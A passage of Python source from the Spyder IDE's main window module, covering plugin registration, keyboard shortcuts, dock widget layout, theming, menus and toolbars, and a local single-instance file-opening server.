from spyder.app.find_plugins import (
find_external_plugins, find_internal_plugins)
from spyder.app.utils import (
create_application, create_splash_screen, create_window, ORIGINAL_SYS_EXIT,
delete_debug_log_files, qt_message_handler, set_links_color, setup_logging,
set_opengl_implementation)
from spyder.api.plugin_registration.registry import PLUGIN_REGISTRY
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import (
Plugins, SpyderPlugin, SpyderPluginV2, SpyderDockablePlugin,
SpyderPluginWidget)
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
#==============================================================================
# Install Qt messaage handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
INITIAL_CWD = getcwd_or_home()
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent")
sig_moved = Signal("QMoveEvent")
sig_layout_setup_ready = Signal(object) # Related to default layouts
# ---- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
Return a plugin instance by providing the plugin class.
"""
if plugin_name in PLUGIN_REGISTRY:
return PLUGIN_REGISTRY.get_plugin(plugin_name)
if error:
raise SpyderAPIError(f'Plugin "{plugin_name}" not found!')
return None
def get_dockable_plugins(self):
"""Get a list of all dockable plugins."""
dockable_plugins = []
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, (SpyderDockablePlugin, SpyderPluginWidget)):
dockable_plugins.append((plugin_name, plugin))
return dockable_plugins
def is_plugin_enabled(self, plugin_name):
"""Determine if a given plugin is going to be loaded."""
return PLUGIN_REGISTRY.is_plugin_enabled(plugin_name)
def is_plugin_available(self, plugin_name):
"""Determine if a given plugin is available."""
return PLUGIN_REGISTRY.is_plugin_available(plugin_name)
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def register_plugin(self, plugin_name, external=False, omit_conf=False):
"""
Register a plugin in Spyder Main Window.
"""
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_compatibility_message(message)
return
# Connect Plugin Signals to main window methods
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Connect Main window Signals to plugin signals
self.sig_moved.connect(plugin.sig_mainwindow_moved)
self.sig_resized.connect(plugin.sig_mainwindow_resized)
# Register plugin
plugin._register(omit_conf=omit_conf)
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
if plugin_name == Plugins.Shortcuts:
for action, context, action_name in self.shortcut_queue:
self.register_shortcut(action, context, action_name)
self.shortcut_queue = []
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
if Plugins.Shortcuts in PLUGIN_REGISTRY:
self.register_shortcut(action, context, action_name)
else:
self.shortcut_queue.append((action, context, action_name))
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
if Plugins.Shortcuts in PLUGIN_REGISTRY:
self.register_shortcut(sc, context, name)
self.register_shortcut(
plugin.toggle_view_action, context, name)
else:
self.shortcut_queue.append((sc, context, name))
self.shortcut_queue.append(
(plugin.toggle_view_action, context, name))
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.shortcuts.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
shortcut = None
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.shortcuts.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
try:
self.widgetlist.remove(plugin)
except ValueError:
pass
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Check if TABIFY is not a list with None as unique value or a default
# list
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
# Show external plugins
if plugin.NAME in PLUGIN_REGISTRY.external_plugins:
plugin.get_widget().toggle_view(True)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure plugins are placed correctly when
# switching layouts.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugin do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
console = self.get_plugin(Plugins.Console, error=False)
if console:
console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
# Set Windows app icon to use .ico file
if os.name == "nt":
qapp.setWindowIcon(ima.get_icon("windows_app_icon"))
# Set default style
self.default_style = str(qapp.style().objectName())
# Save command line options for plugins to access them
self._cli_options = options
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
self.shortcut_queue = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
self._path_manager = None
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins or to prevent collisions with other
# attributes, i.e layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# ---- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
PLUGIN_REGISTRY.sig_plugin_ready.connect(
lambda plugin_name, omit_conf: self.register_plugin(
plugin_name, omit_conf=omit_conf))
PLUGIN_REGISTRY.set_main(self)
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Set css_path as a configuration to be used by the plugins
CONF.set('appearance', 'css_path', css_path)
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
registry_internal_plugins = {}
registry_external_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
# Disable panes that use web widgets (currently Help and Online
# Help) if the user asks for it.
# See spyder-ide/spyder#16518
if self._cli_options.no_web_widgets:
if "help" in plugin_name:
continue
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
if plugin_name in internal_plugins:
registry_internal_plugins[plugin_name] = (
plugin_main_attribute_name, plugin)
else:
registry_external_plugins[plugin_name] = (
plugin_main_attribute_name, plugin)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
PLUGIN_REGISTRY.set_plugin_enabled(plugin_name)
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
PLUGIN_REGISTRY.set_plugin_enabled(plugin_name)
PLUGIN_REGISTRY.set_all_internal_plugins(registry_internal_plugins)
PLUGIN_REGISTRY.set_all_external_plugins(registry_external_plugins)
# Instantiate internal Spyder 5 plugins
for plugin_name in internal_plugins:
if plugin_name in enabled_plugins:
PluginClass = internal_plugins[plugin_name]
if issubclass(PluginClass, SpyderPluginV2):
PLUGIN_REGISTRY.register_plugin(self, PluginClass,
external=False)
# Instantiate internal Spyder 4 plugins
for plugin_name in internal_plugins:
if plugin_name in enabled_plugins:
PluginClass = internal_plugins[plugin_name]
if issubclass(PluginClass, SpyderPlugin):
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=False)
self.preferences.register_plugin_preferences(
plugin_instance)
# Instantiate external Spyder 5 plugins
for plugin_name in external_plugins:
if plugin_name in enabled_plugins:
PluginClass = external_plugins[plugin_name]
try:
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=True)
except Exception as error:
print("%s: %s" % (PluginClass, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = PLUGIN_REGISTRY.register_plugin(self, mod,
external=True)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if not hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.thirdparty_plugins.append(plugin)
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.plugins.mainmenu.api import (
ApplicationMenus, ToolsMenuSections, FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut,
id_='file_switcher')
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut,
id_='symbol_finder')
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions += [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action,
None]
if self.get_plugin(Plugins.Editor, error=False):
self.edit_menu_actions += self.editor.edit_menu_actions
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
id_='spyder_path_action')
from spyder.plugins.application.container import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = ApplicationActions.SpyderWindowsEnvVariables
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action,
before_section=ToolsMenuSections.External
)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the mainwindow
as before, e.g self.console or self.main.console, preserving the
same accessor as before.
"""
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins
try:
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(
self._INTERNAL_PLUGINS_MAPPING[attr], error=False)
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
for plugin_name in PLUGIN_REGISTRY:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
# Tabify external plugins which were installed after Spyder was
# installed.
# Note: This is only necessary the first time a plugin is loaded.
# Afterwwrds, the plugin placement is recorded on the window hexstate,
# which is loaded by the layouts plugin during the next session.
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
if plugin_instance.get_conf('first_time', True):
self.tabify_plugin(plugin_instance, Plugins.Console)
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
# Register custom layouts
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
if hasattr(plugin_instance, 'CUSTOM_LAYOUTS'):
if isinstance(plugin_instance.CUSTOM_LAYOUTS, list):
for custom_layout in plugin_instance.CUSTOM_LAYOUTS:
self.layouts.register_layout(
self, custom_layout)
else:
logger.info(
'Unable to load custom layouts for {}. '
'Expecting a list of layout classes but got {}'
.format(plugin_name, plugin_instance.CUSTOM_LAYOUTS)
)
self.layouts.update_layout_menu_actions()
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""
Actions to be performed only after the main window's `show` method
is triggered.
"""
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
# Call on_mainwindow_visible for all plugins.
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
plugin.on_mainwindow_visible()
QApplication.processEvents()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (
CONF.get('main', 'single_instance') and
not self._cli_options.new_instance and
self.open_files_server
):
t = threading.Thread(target=self.start_open_files_server)
t.daemon = True
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Reopen last session if no project is active
# NOTE: This needs to be after the calls to on_mainwindow_visible
self.reopen_last_session()
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# To avoid regressions. We shouldn't have loaded the modules
# below at this point.
if DEV is not None:
assert 'pandas' not in sys.modules
assert 'matplotlib' not in sys.modules
# Restore undocked plugins
self.restore_undocked_plugins()
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def reopen_last_session(self):
"""
Reopen last session if no project is active.
This can't be moved to on_mainwindow_visible in the editor because we
need to let the same method on Projects run first.
"""
projects = self.get_plugin(Plugins.Projects, error=False)
editor = self.get_plugin(Plugins.Editor, error=False)
reopen_last_session = False
if projects:
if projects.get_active_project() is None:
reopen_last_session = True
else:
reopen_last_session = True
if editor and reopen_last_session:
